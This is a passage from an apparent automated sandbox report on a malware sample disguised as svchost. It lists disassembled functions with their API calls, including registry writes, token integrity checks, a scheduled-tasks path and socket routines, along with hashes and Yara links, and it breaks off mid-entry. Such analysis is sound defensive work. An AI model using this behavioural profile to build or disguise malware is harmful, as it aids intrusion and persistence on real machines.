                                                                                                                                                                                                                • Opcode ID: 7cb908ce05aa52ca6a9684a0f59a944d72fefc1c9773a831595b46f3f431c65b
                                                                                                                                                                                                                • Instruction ID: 4051bab9305699668e977b3f05bfc6811eb3c00d469c3eb369edc5c6df1072d5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7cb908ce05aa52ca6a9684a0f59a944d72fefc1c9773a831595b46f3f431c65b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CF11D631E102086FDF10DFA9EC44B9EB779FF45391F808669FA15E7291D77099148B50
                                                                                                                                                                                                                Function 02BC1846 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 59registryCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(00000001,software\microsoft,00000000,00000102,-80000001,?,?,?,?,?,?,0000001C,00000000), ref: 02BC18AD
                                                                                                                                                                                                                • RegSetValueExA.ADVAPI32(-80000001,9E938DA8a,00000000,00000001,?,00000104,?,?,?,?,0000001C,00000000), ref: 02BC18CF
                                                                                                                                                                                                                • RegFlushKey.ADVAPI32(-80000001,?,?,?,?,0000001C,00000000), ref: 02BC18DD
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(-80000001,?,?,?,?,0000001C,00000000), ref: 02BC18F0
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseFlushOpenValue
                                                                                                                                                                                                                • String ID: 9E938DA8a$software\microsoft
                                                                                                                                                                                                                • API String ID: 2510291871-208054846
                                                                                                                                                                                                                • Opcode ID: 07b752f45d239b14a6f9d77945e6fef9fdc9a4d5d8a3c6c733fe48adc81bb746
                                                                                                                                                                                                                • Instruction ID: bfa7b4f6deb79c64f231ff8cc74871449361d7d9c97f261557a0a095ec902028
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 07b752f45d239b14a6f9d77945e6fef9fdc9a4d5d8a3c6c733fe48adc81bb746
                                                                                                                                                                                                                • Instruction Fuzzy Hash: DE11C174A18204ABEB24CA74C888FAE3369EF48744F6044ACF689E7141D670E9958B50
                                                                                                                                                                                                                Function 004034C0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetVersionExA.KERNEL32(?,\\?\globalroot\systemroot\system32\tasks\), ref: 004034E7
                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000008,00000000), ref: 00403509
                                                                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00403510
                                                                                                                                                                                                                • GetTokenInformation.ADVAPI32(00000000,00000012(TokenIntegrityLevel),?,00000004,?), ref: 00403531
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00403547
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • \\?\globalroot\systemroot\system32\tasks\, xrefs: 004034C9
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2639699727.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2639699727.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ProcessToken$CloseCurrentHandleInformationOpenVersion
                                                                                                                                                                                                                • String ID: \\?\globalroot\systemroot\system32\tasks\
                                                                                                                                                                                                                • API String ID: 4133869067-1576788796
                                                                                                                                                                                                                • Opcode ID: cd9cee1f28ce7391e7550083cfa8bb7bde7286681f103bbdee0c8fcbe7e62476
                                                                                                                                                                                                                • Instruction ID: a2ec502b7bb4083542b5d35a97e2222aece09e1ccb5a5fef7106c32bda11fc1e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: cd9cee1f28ce7391e7550083cfa8bb7bde7286681f103bbdee0c8fcbe7e62476
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 150165B5A00218FBEB24DFA0DD48F9A7BBCAB44B06F0080A5E609B2191D6749B44DF65
                                                                                                                                                                                                                Function 02BC98F0 Relevance: 10.5, APIs: 7, Instructions: 43networkthreadCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • shutdown.WS2_32(?,00000001), ref: 02BC990B
                                                                                                                                                                                                                • shutdown.WS2_32(02BC99EC,00000001), ref: 02BC9910
                                                                                                                                                                                                                • recv.WS2_32(02BC99EC,?,00000400,00000000), ref: 02BC992F
                                                                                                                                                                                                                • recv.WS2_32(?,?,00000400,00000000), ref: 02BC9945
                                                                                                                                                                                                                • closesocket.WS2_32(?), ref: 02BC9959
                                                                                                                                                                                                                • closesocket.WS2_32(02BC99EC), ref: 02BC995C
                                                                                                                                                                                                                • ExitThread.KERNEL32 ref: 02BC9960
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: closesocketrecvshutdown$ExitThread
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1638183600-0
                                                                                                                                                                                                                • Opcode ID: c75591cef078fd99a1ff70c216e1cf00fad9c0925acd8ed1c4b25015327413ee
                                                                                                                                                                                                                • Instruction ID: 4c186b00760b2f8fd01949405e0fc233ed56aee6f43434fc364ee06110437276
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c75591cef078fd99a1ff70c216e1cf00fad9c0925acd8ed1c4b25015327413ee
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8AF0A4B2950718BBE7309A64CC45F9B3B6CEB48790F004444BB04BB180D6B4B800CFE4
                                                                                                                                                                                                                Function 02BB2850 Relevance: 9.1, APIs: 6, Instructions: 87COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: callocexitfree
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3367576030-0
                                                                                                                                                                                                                • Opcode ID: 8715d87a6b0ce08040e7d8eb63462857548e5286f77aa6196f1b70fc59c8ae33
                                                                                                                                                                                                                • Instruction ID: d6a07568e2c4dbdadc3b1baf9722c85308eacf63bcd83cf73c8ab32dabf54504
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8715d87a6b0ce08040e7d8eb63462857548e5286f77aa6196f1b70fc59c8ae33
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A1216DB1A00309AFDB21CF58DC80AAB7BA8FF48350F144569FE4597340D7B1ED108BA1
                                                                                                                                                                                                                Function 02BD52D0 Relevance: 9.1, APIs: 6, Instructions: 72windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,00002710,000004FF), ref: 02BD52EB
                                                                                                                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 02BD531C
                                                                                                                                                                                                                • TranslateMessage.USER32(?), ref: 02BD5338
                                                                                                                                                                                                                • DispatchMessageW.USER32(?), ref: 02BD533E
                                                                                                                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 02BD534C
                                                                                                                                                                                                                • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,00002710,000004FF), ref: 02BD5364
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Message$MultipleObjectsPeekWait$DispatchTranslate
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1800058468-0
                                                                                                                                                                                                                • Opcode ID: c397b38e6d45b19fb68301f46c90fdb7661779217a6f6eb38397db9a569f05f5
                                                                                                                                                                                                                • Instruction ID: 733e3c5ac0ff8c8fa8c312f868f4720d677e56cbcfafc037ab3e5d821aae978c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c397b38e6d45b19fb68301f46c90fdb7661779217a6f6eb38397db9a569f05f5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F1119472B803097BE73096589C86FEEB769EB40B50F908955FB05EB1C0D7E1E451C7A4
                                                                                                                                                                                                                Function 02BBCBF0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 89COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetWindowRect.USER32(02BBCD24,00000000), ref: 02BBCBFF
                                                                                                                                                                                                                • GetWindowLongA.USER32(02BBCD24,000000F0), ref: 02BBCC19
                                                                                                                                                                                                                • GetScrollBarInfo.USER32(02BBCD24,000000FA,?), ref: 02BBCC34
                                                                                                                                                                                                                • GetScrollBarInfo.USER32(02BBCD24,000000FB,0000003C), ref: 02BBCC61
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: InfoScrollWindow$LongRect
                                                                                                                                                                                                                • String ID: <
                                                                                                                                                                                                                • API String ID: 4167475372-4251816714
                                                                                                                                                                                                                • Opcode ID: 3081973297532e19feb020a93bfc817a846309b9c647e1c657ac2d560d1dfbd3
                                                                                                                                                                                                                • Instruction ID: 68f7259f094113e4bf1590c79077a86b9ca7a7f2509b40a4e297f73a345e5ba9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3081973297532e19feb020a93bfc817a846309b9c647e1c657ac2d560d1dfbd3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: DE3115B0901B01AFC325CF6AC584AA6FBF5FF58315B608A1EE49A93A64D770F450CF90
                                                                                                                                                                                                                Function 02BF41A0 Relevance: 8.8, APIs: 7, Instructions: 78COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: freemalloc
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3061335427-0
                                                                                                                                                                                                                • Opcode ID: 782726452593e25d881ef42993aafeafd3968412683e38fab6c8a60cd5a0969f
                                                                                                                                                                                                                • Instruction ID: 69a1b9ea651218f022f7d1644b8be1e8dc5d3704488cdee7a44028e1dc8c59b4
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 782726452593e25d881ef42993aafeafd3968412683e38fab6c8a60cd5a0969f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F5215EF2A117144BD770AF79AC8164BB7E4EF84225B198C3ED78AD7600D370E1598B91
                                                                                                                                                                                                                Function 02BC41E0 Relevance: 8.8, APIs: 7, Instructions: 55memoryCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,02BD5097,00000000,756934D0,?,?,02BD5084,00000104,?,?,?,?,00000000,00000000), ref: 02BC41FE
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,02BD5084,00000104,?,?,?,?,00000000,00000000), ref: 02BC4205
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BC4215
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,00000000,756934D0,?,?,02BD5084,00000104,?,?,?,?,00000000,00000000), ref: 02BC4229
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000,?,?,02BD5084,00000104,?,?,?,?,00000000,00000000), ref: 02BC4230
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000000,02BD4081,?,?,02BD5084,00000104,?,?,?,?,00000000,00000000), ref: 02BC424A
                                                                                                                                                                                                                • HeapReAlloc.KERNEL32(00000000,?,?,02BD5084,00000104,?,?,?,?,00000000,00000000), ref: 02BC4251
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$Alloc$Validatememset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3638075499-0
                                                                                                                                                                                                                • Opcode ID: c5c7ed7c1994d230e59fae7223682666d463b9101672e334c5c18d0c030be2b3
                                                                                                                                                                                                                • Instruction ID: d6f1de9861bd99430aa6ec0255bf03289b2cacfd33664836569bb1e692ca35e9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c5c7ed7c1994d230e59fae7223682666d463b9101672e334c5c18d0c030be2b3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8401DF77A8021067D67056BAAC49F4B7A6CEBD07B2F254221FB48CB284CA21881487F4
                                                                                                                                                                                                                Function 02BC7810 Relevance: 8.8, APIs: 7, Instructions: 50memoryCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 02BD4980: OpenProcess.KERNEL32(00000400,00000000,00000000,00000000,00000000,7742FFB0,?,?,?,?,?,02BC7967,00000000,?,00000000), ref: 02BD49AD
                                                                                                                                                                                                                  • Part of subcall function 02BD4980: GetProcessTimes.KERNEL32(00000000,?,?,?,02BC7967,?,?,?,?,?,02BC7967,00000000,?,00000000), ref: 02BD49CA
                                                                                                                                                                                                                  • Part of subcall function 02BD4980: GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,02BC7967,00000000,?,00000000), ref: 02BD49E2
                                                                                                                                                                                                                  • Part of subcall function 02BD4980: CloseHandle.KERNEL32(00000000,?,?,?,?,?,02BC7967,00000000), ref: 02BD49F3
                                                                                                                                                                                                                • EnterCriticalSection.KERNEL32(02BFFB80,000002E8,00000000,00000000,029567E8,02BC7AD4), ref: 02BC7828
                                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(02BFFB80), ref: 02BC7844
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,029567E8), ref: 02BC7869
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BC786C
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,029567E8), ref: 02BC7879
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02BC787C
                                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(02BFFB80), ref: 02BC7887
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HeapProcess$CriticalSection$HandleLeave$CloseEnterFreeInformationOpenTimesValidate
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3901171168-0
                                                                                                                                                                                                                • Opcode ID: e288b62a1a507104368b3b65163e0ca4f186b9611979c7099517430063572fc6
                                                                                                                                                                                                                • Instruction ID: 2bcc8de3f8500a2d5a786017364e93b4a93ad66ae90753b004e779cce3e3b6f9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e288b62a1a507104368b3b65163e0ca4f186b9611979c7099517430063572fc6
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 47018872E41310ABD7705FA69858F66BB5CEFCCBA27618459E34593240CB306451CFE0
                                                                                                                                                                                                                Function 00401420 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 48libraryloaderCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 0040144A
                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(ntdll.dll,?,00402BAE,-00000006,00000000), ref: 00401457
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401463
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2639699727.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2639699727.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AddressCountHandleModuleProcTick
                                                                                                                                                                                                                • String ID: RtlUniform$ntdll.dll
                                                                                                                                                                                                                • API String ID: 1545651562-3277137149
                                                                                                                                                                                                                • Opcode ID: 846a4d946463fd889953915331e6662e7c5f164914c665561fc20ec9cc3dfa3e
                                                                                                                                                                                                                • Instruction ID: 5661f09ceaf7dd6985fdec3726855c2d4268d42b19af7d6053b1c23afd98fc53
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 846a4d946463fd889953915331e6662e7c5f164914c665561fc20ec9cc3dfa3e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3001DB716003049BC714ABBAAC829D6B79DDF89745300813AEB19E32E2C635DC488BAD
                                                                                                                                                                                                                Function 00401390 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23libraryloaderCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 0040139B
                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(ntdll.dll,?,00402BA2,00000000), ref: 004013AC
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 004013BC
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2639699727.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2639699727.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AddressCountHandleModuleProcTick
                                                                                                                                                                                                                • String ID: RtlUniform$ntdll.dll
                                                                                                                                                                                                                • API String ID: 1545651562-3277137149
                                                                                                                                                                                                                • Opcode ID: ffa31b1aa032498b302ac31cd015523b39c7887b3f6490af6b71b29526461ec5
                                                                                                                                                                                                                • Instruction ID: 972971b60caab807df67e590393efcb4d1d6a3813561f3a0b79f06a1da21d750
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ffa31b1aa032498b302ac31cd015523b39c7887b3f6490af6b71b29526461ec5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 69E01AB06203049BEB10AFB1AD09A5637DC9FC47413048032BB09F21A1DA38C8248B6D
                                                                                                                                                                                                                Function 02BC43D0 Relevance: 7.6, APIs: 5, Instructions: 111COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BC43D9
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BC440C
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BC4438
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BC445F
                                                                                                                                                                                                                • SetLastError.KERNEL32(?), ref: 02BC44DD
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: QueryVirtual$ErrorLast
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2886163261-0
                                                                                                                                                                                                                • Opcode ID: a3e84739b8957e163c6b4e3be38dcbe00c349002ed6f11198ba62350cb7505bb
                                                                                                                                                                                                                • Instruction ID: e498500eb31186ac90adcd9cc44349e6c848dbfceec546d5ba50816649e74060
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a3e84739b8957e163c6b4e3be38dcbe00c349002ed6f11198ba62350cb7505bb
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9C410D70D00218AFDB50DFA8D884AEEBBF5EF48704F64856EE955E7240E774AA408F91
                                                                                                                                                                                                                Function 02BCAAA0 Relevance: 7.6, APIs: 6, Instructions: 106memorystringCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • strstr.MSVCRT ref: 02BCAACC
                                                                                                                                                                                                                • strstr.MSVCRT ref: 02BCAAF1
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,-00000012,?,?,?,?,?,02BC1A39), ref: 02BCAB71
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,02BC1A39), ref: 02BCAB78
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BCAB88
                                                                                                                                                                                                                • lstrcpynA.KERNEL32(00000000,00000000,00000001,?,?,?,?,?,02BC1A39), ref: 02BCAB9D
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heapstrstr$AllocProcesslstrcpynmemset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2033102291-0
                                                                                                                                                                                                                • Opcode ID: aca02ebed7f4a9f801cec8c5c1a3f327a5eb19e40e7398e7197aa42f6acad68f
                                                                                                                                                                                                                • Instruction ID: d5037526b672daaf06a089df85ccf287c31813160e1a430b786f9aab625ff9f3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: aca02ebed7f4a9f801cec8c5c1a3f327a5eb19e40e7398e7197aa42f6acad68f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 12310B72A0021D5BD7324E289C84BBA7F9BDF41298F3986EDED85C7201D732DD058790
                                                                                                                                                                                                                Function 02BC42A0 Relevance: 7.6, APIs: 5, Instructions: 105COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BC42A9
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BC42DC
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BC4308
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BC432F
                                                                                                                                                                                                                • SetLastError.KERNEL32(?), ref: 02BC43AD
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: QueryVirtual$ErrorLast
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2886163261-0
                                                                                                                                                                                                                • Opcode ID: 5d63829c8c9d32abf4589f097203a36c04b2be697cd74d6f5100b08175f12ab9
                                                                                                                                                                                                                • Instruction ID: 6101a8163dd7c8d5915ae90fbb4f736d62e8ac0f0f42ddfe30bbdcb0256a592e
